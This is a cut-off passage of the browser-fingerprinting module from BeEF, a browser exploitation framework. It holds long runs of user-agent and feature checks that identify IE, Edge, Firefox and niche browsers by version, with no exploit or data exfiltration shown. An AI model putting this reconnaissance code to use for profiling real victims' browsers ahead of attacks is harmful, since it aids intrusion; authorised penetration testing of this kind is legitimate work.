// Copyright (c) 2006-2025 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
* Basic browser functions.
* @namespace beef.browser
beef.browser = {
* Returns the protocol.
* @example: beef.browser.getProtocol()
getProtocol: function() {
return document.location.protocol;
* Returns the user agent that the browser is claiming to be.
* @example: beef.browser.getBrowserReportedName()
getBrowserReportedName: function () {
return navigator.userAgent;
* Returns the underlying layout engine in use by the browser.
* @example: beef.browser.getBrowserEngine()
getBrowserEngine: function() {
try {
var engine = platform.layout;
if (!!engine)
return engine;
} catch (e) {}
return 'unknown';
* Returns true if Avant Browser.
* @example: beef.browser.isA()
isA: function () {
return window.navigator.userAgent.match(/Avant TriCore/) != null;
* Returns true if Iceweasel.
* @example: beef.browser.isIceweasel()
isIceweasel: function () {
return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
* Returns true if Midori.
* @example: beef.browser.isMidori()
isMidori: function () {
return window.navigator.userAgent.match(/Midori\/\d+\.\d/) != null;
* Returns true if Odyssey
* @example: beef.browser.isOdyssey()
isOdyssey: function () {
return (window.navigator.userAgent.match(/Odyssey Web Browser/) != null && window.navigator.userAgent.match(/OWB\/\d+\.\d/) != null);
* Returns true if Brave
* @example: beef.browser.isBrave()
isBrave: function(){
return (window.navigator.userAgent.match(/brave\/\d+\.\d/) != null && window.navigator.userAgent.match(/Brave\/\d+\.\d/) != null);
* Returns true if IE6.
* @example: beef.browser.isIE6()
isIE6: function () {
return !window.XMLHttpRequest && !window.globalStorage;
* Returns true if IE7.
* @example: beef.browser.isIE7()
isIE7: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode;
* Returns true if IE8.
* @example: beef.browser.isIE8()
isIE8: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
* Returns true if IE9.
* @example: beef.browser.isIE9()
isIE9: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints === "undefined";
* Returns true if IE10.
* @example: beef.browser.isIE10()
isIE10: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined";
* Returns true if IE11.
* @example: beef.browser.isIE11()
isIE11: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined" && typeof document.selection === "undefined" && typeof document.createStyleSheet === "undefined" && typeof window.createPopup === "undefined" && typeof window.XDomainRequest === "undefined";
* Returns true if Edge.
* @example: beef.browser.isEdge()
isEdge: function () {
return !beef.browser.isIE() && !!window.styleMedia && (/Edg\/\d+\.\d/.test(window.navigator.userAgent) || /Edge\/\d+\.\d/.test(window.navigator.userAgent));
* Returns true if IE.
* @example: beef.browser.isIE()
isIE: function () {
return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10() || this.isIE11();
* Returns true if FF2.
* @example: beef.browser.isFF2()
isFF2: function () {
return !!window.globalStorage && !window.postMessage;
* Returns true if FF3.
* @example: beef.browser.isFF3()
isFF3: function () {
return !!window.globalStorage && !!window.postMessage && !JSON.parse;
* Returns true if FF3.5.
* @example: beef.browser.isFF3_5()
isFF3_5: function () {
return !!window.globalStorage && !!JSON.parse && !window.FileReader;
* Returns true if FF3.6.
* @example: beef.browser.isFF3_6()
isFF3_6: function () {
return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState;
* Returns true if FF4.
* @example: beef.browser.isFF4()
isFF4: function () {
return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null;
* Returns true if FF5.
* @example: beef.browser.isFF5()
isFF5: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null;
* Returns true if FF6.
* @example: beef.browser.isFF6()
isFF6: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null;
* Returns true if FF7.
* @example: beef.browser.isFF7()
isFF7: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null;
* Returns true if FF8.
* @example: beef.browser.isFF8()
isFF8: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null;
* Returns true if FF9.
* @example: beef.browser.isFF9()
isFF9: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null;
* Returns true if FF10.
* @example: beef.browser.isFF10()
isFF10: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
* Returns true if FF11.
* @example: beef.browser.isFF11()
isFF11: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
* Returns true if FF12
* @example: beef.browser.isFF12()
isFF12: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
* Returns true if FF13
* @example: beef.browser.isFF13()
isFF13: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
* Returns true if FF14
* @example: beef.browser.isFF14()
isFF14: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
* Returns true if FF15
* @example: beef.browser.isFF15()
isFF15: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
* Returns true if FF16
* @example: beef.browser.isFF16()
isFF16: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
* Returns true if FF17
* @example: beef.browser.isFF17()
isFF17: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null;
* Returns true if FF18
* @example: beef.browser.isFF18()
isFF18: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
* Returns true if FF19
* @example: beef.browser.isFF19()
isFF19: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/19\./) != null;
* Returns true if FF20
* @example: beef.browser.isFF20()
isFF20: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
* Returns true if FF21
* @example: beef.browser.isFF21()
isFF21: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
* Returns true if FF22
* @example: beef.browser.isFF22()
isFF22: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
* Returns true if FF23
* @example: beef.browser.isFF23()
isFF23: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
* Returns true if FF24
* @example: beef.browser.isFF24()
isFF24: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
* Returns true if FF25
* @example: beef.browser.isFF25()
isFF25: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null;
* Returns true if FF26
* @example: beef.browser.isFF26()
isFF26: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/26./) != null;
* Returns true if FF27
* @example: beef.browser.isFF27()
isFF27: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && window.navigator.userAgent.match(/Firefox\/27./) != null;
* Returns true if FF28
* @example: beef.browser.isFF28()
isFF28: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt !== 'function' && window.navigator.userAgent.match(/Firefox\/28./) != null;
* Returns true if FF29
* @example: beef.browser.isFF29()
isFF29: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/29./) != null;
* Returns true if FF30
* @example: beef.browser.isFF30()
isFF30: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/30./) != null;
* Returns true if FF31
* @example: beef.browser.isFF31()
isFF31: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/31./) != null;
* Returns true if FF32
* @example: beef.browser.isFF32()
isFF32: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/32./) != null;
* Returns true if FF33
* @example: beef.browser.isFF33()
isFF33: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/33./) != null;
* Returns true if FF34
* @example: beef.browser.isFF34()
isFF34: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/34./) != null;
* Returns true if FF35
* @example: beef.browser.isFF35()
isFF35: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/35./) != null;
* Returns true if FF36
* @example: beef.browser.isFF36()
isFF36: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/36./) != null;
* Returns true if FF37
* @example: beef.browser.isFF37()
isFF37: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/37./) != null;
* Returns true if FF38
* @example: beef.browser.isFF38()
isFF38: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/38./) != null;
* Returns true if FF39
* @example: beef.browser.isFF39()
isFF39: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/39./) != null;
* Returns true if FF40
* @example: beef.browser.isFF40()
isFF40: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/40./) != null;
* Returns true if FF41
* @example: beef.browser.isFF41()
isFF41: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/41./) != null;
* Returns true if FF42
* @example: beef.browser.isFF42()
isFF42: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/42./) != null;
* Returns true if FF43
* @example: beef.browser.isFF43()
isFF43: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/43./) != null;
* Returns true if FF44
* @example: beef.browser.isFF44()
isFF44: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/44./) != null;
* Returns true if FF45
* @example: beef.browser.isFF45()
isFF45: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/45./) != null;
* Returns true if FF46
* @example: beef.browser.isFF46()
isFF46: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/46./) != null;
* Returns true if FF47
* @example: beef.browser.isFF47()
isFF47: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/47./) != null;
* Returns true if FF48
* @example: beef.browser.isFF48()
isFF48: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/48./) != null;
* Returns true if FF49
* @example: beef.browser.isFF49()
isFF49: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/49./) != null;
* Returns true if FF50
* @example: beef.browser.isFF50()
isFF50: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/50./) != null;
* Returns true if FF51
* @example: beef.browser.isFF51()
isFF51: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/51./) != null;
* Returns true if FF52
* @example: beef.browser.isFF52()
isFF52: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/52./) != null;
* Returns true if FF53
* @example: beef.browser.isFF53()
isFF53: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/53./) != null;
* Returns true if FF54
* @example: beef.browser.isFF54()
isFF54: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/54./) != null;
* Returns true if FF55
* @example: beef.browser.isFF55()
isFF55: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/55./) != null;
* Returns true if FF56
* @example: beef.browser.isFF56()
isFF56: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/56./) != null;
* Returns true if FF57
* @example: beef.browser.isFF57()
isFF57: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/57./) != null;
* Returns true if FF58
* @example: beef.browser.isFF58()
isFF58: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/58./) != null;
* Returns true if FF59
* @example: beef.browser.isFF59()
isFF59: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/59./) != null;
* Returns true if FF60
* @example: beef.browser.isFF60()
isFF60: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/60./) != null;
* Returns true if FF61
* @example: beef.browser.isFF61()
isFF61: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/61./) != null;
* Returns true if FF62
* @example: beef.browser.isFF62()
isFF62: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/62./) != null;
* Returns true if FF63
* @example: beef.browser.isFF63()
isFF63: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/63./) != null;
* Returns true if FF64
* @example: beef.browser.isFF64()
isFF64: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/64./) != null;
* Returns true if FF65
* @example: beef.browser.isFF65()
isFF65: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/65./) != null;
* Returns true if FF66
* @example: beef.browser.isFF66()
isFF66: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/66./) != null;
* Returns true if FF67
* @example: beef.browser.isFF67()
isFF67: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/67./) != null;
* Returns true if FF68
* @example: beef.browser.isFF68()
isFF68: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/68./) != null;
* Returns true if FF69
* @example: beef.browser.isFF69()
isFF69: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/69./) != null;
* Returns true if FF70
* @example: beef.browser.isFF70()
isFF70: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/70./) != null;
* Returns true if FF71
* @example: beef.browser.isFF71()
isFF71: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/71./) != null;
* Returns true if FF72
* @example: beef.browser.isFF72()
isFF72: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/72./) != null;
* Returns true if FF73
* @example: beef.browser.isFF73()
isFF73: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/73./) != null;
* Returns true if FF74
* @example: beef.browser.isFF74()
isFF74: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/74./) != null;
* Returns true if FF75
* @example: beef.browser.isFF75()
isFF75: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/75./) != null;
* Returns true if FF76
* @example: beef.browser.isFF76()
isFF76: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/76./) != null;
* Returns true if FF77
* @example: beef.browser.isFF77()
isFF77: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/77./) != null;
* Returns true if FF78
* @example: beef.browser.isFF78()
isFF78: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/78./) != null;
* Returns true if FF79
* @example: beef.browser.isFF79()
isFF79: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/79./) != null;
* Returns true if FF80
* @example: beef.browser.isFF80()
isFF80: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/80./) != null;
* Returns true if FF81
* @example: beef.browser.isFF81()
isFF81: function () {
